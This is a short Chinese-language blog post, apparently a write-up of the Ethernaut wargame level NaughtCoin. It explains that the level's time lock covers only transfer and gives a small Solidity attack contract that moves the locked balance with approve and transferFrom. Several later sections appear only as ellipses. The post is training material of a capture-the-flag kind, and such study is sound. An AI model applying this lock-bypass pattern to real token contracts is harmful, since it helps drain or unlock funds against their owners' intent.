# 智能合约黑客攻击 Ethernaut:  
 15. NaughtCoin

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-15-naughtcoin

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目玩家在ERC20合约有余额，但是被锁住了，需要提前把余额转走。Hack思路只是锁住了transfer 方法，还有其他的 approve机制也可以讲代币转走。 先手动 approve 给攻击合约足够的钱，再调用攻击函数。import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; contract NaughtCoinHack { IERC20 public exploitInst; constructor(address _target) { exploitInst = IERC20(_target); } function attack() external payable { exploitInst.transferFrom(msg.sender, address(this), exploitInst.balanceOf(msg.sender)); } } Hack案例…防范思路…参考资料….

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter